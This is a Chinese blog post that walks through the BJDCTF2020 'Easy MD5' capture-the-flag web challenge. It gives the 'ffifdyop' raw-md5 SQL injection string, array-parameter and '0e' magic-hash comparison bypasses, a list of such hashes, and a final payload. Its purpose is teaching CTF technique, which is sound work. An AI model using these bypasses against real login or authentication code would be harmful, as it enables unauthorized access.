[BJDCTF2020]Easy MD5 1

于 2023-03-26 13:52:38 发布
阅读量804 收藏
点赞数
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73728268/article/details/129778410
版权

文章目录

[BJDCTF2020]Easy MD5 1

知识点一sql注入绕过md5

在这里插入图片描述

select * from ‘admin’ where password=md5($pass,true)

源码中的提示,绕过md5,ffifdyop这个进行md5加密后变成276f722736c95d99e921722cf9ed621c
这个前几位经过mysql转换成十进制后对应的ASCII码内容为刚好是’ or '正好闭合,又因为or是万能密码头,即可以绕过

知识点二md5绕比较
<!-- $a = $GET['a']; $b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

1.利用数组绕过
a[]=1&b[]=1,由于 md5 函数哈希数组会返回 NULL,故只需传入不同的数组即可

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

2.利用0e科学计数法加科学计数法即可绕过即可

QNKCDZO
0e830400451993494058024219903391
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514

payload:param1[]=0e509367213418206700842008763514&param2[]=0e848240448830537924465865611904
即可得到flag

md5绕过学习

Harder.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[BJDCTF2020]Easy MD5【超详细讲解】
wo41ge的博客
11-15 1989
进入 题目链接 不管你输入什么 他只会修改这里 页面没有回显 没反应 开始 四处找找 这不就找到提示了吧 就很nice奥 进行post传参
BUUCTF [BJDCTF2020]Easy MD5 1
m0_73995922的博客
12-05 590
尝试sql注入发现无回显只有url中传递password参数尝试burpsuite抓包提示我们sql语句,关于password=md5($pass,true) ,这里我们需要用到字符串ffifdyop,它的md5结果是:276f722736c95d99e921722cf9ed621c 。通过这个结果我们可以发现得到16字节的二进制被解析为字符的结果是:'or'6,sql语句变成select * from 'admin' where password=''or'6'。参考(1条消息) PHP中MD5常见绕过_
[BJDCTF2020]Easy MD51
cuddlylm的博客
05-12 1601
考点:Sql md5注入,md5 passby 在header里面有提示 select * from 'admin' where password=md5($pass,true) 这个点做过原题,第一次做的话可能遇到这种会有点蒙,上网找 payload 可以很轻松地找到 ffifdyop,这个点的原理是 ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c,这个字符串前几位刚好是 ‘ or ‘6,而 Mysql 刚好又会吧 hex 转
MD5.zip_MD5Java_easy _elephantykb
09-21
1. MD5Utils.java:这很可能是实现MD5加密功能的Java类,通常会包含一个或多个方法,如`getMD5(String input)`,用于接收字符串输入并返回其MD5值。这个类可能还包含了其他辅助方法,比如将字节数组转换为16进制字符...
Easy MD5加密工具
最新发布
06-30
Easy MD5是一款额可以计算文件、目录以及子目录下所有文件的MD5摘要码的md5值计算软件,用户可以直接将文件或者目录拖曳到该软件窗口,计算结果即会显示出来。该工具也可以计算32K以下字符串的MD5摘要码,用户只需...
2.rar_1T16_dwt_easy _noiseb5p
07-14
matlab cod fore DWT very Easy
批量修改视频MD5
03-16
MD5,全称为Message-Digest Algorithm 5,是一种广泛用于数据完整性校验和安全认证的哈希函数。在IT行业中,MD5常被用来验证文件的原始性和完整性,因为同一个文件的MD5值通常是固定的。当文件内容发生任何改变,其...
Easy Touch 5 Touchscreen Virtual Controls 5.0.12
04-14
Easy Touch 5 触屏虚拟控制器5.0.12详解》 在移动设备领域,尤其是Android系统中,为了优化用户体验,许多开发者选择引入触摸屏虚拟控制元素。"Easy Touch 5 Touchscreen Virtual Controls 5.0.12"正是这样一款专...
字符串加密后md5为 0exxxx 的字符串
weixin_43460822的博客
10-23 596
字符串加密后md5为 0exxxx 的字符串 (x 必须是 10 进制数字) 列表 字符串 MD5 QNKCDZO 0e830400451993494058024219903391 240610708 0e462097431906509019562988736854 aabg7XSs 0e087386482136013740957780965295 aabC9RqS 0e0410225181657...
web buuctf [BJDCTF2020]Easy MD51
weixin_44214568的博客
03-14 1468
1.查看源代码,无异常;输入字符串发现传参password,尝试sql注入没有看到异常 2.传参抓包,在respose的消息头内有hint(线索):select * from 'admin' where password=md5($pass,true) 就是说,传参的值经过md5(string,true)后,使sql语句能够执行,完成注入 3.语法:md5(string,raw) 参数 描述 string 必需。要计算的字符串。 raw 可选。 默认不写为
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8384
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值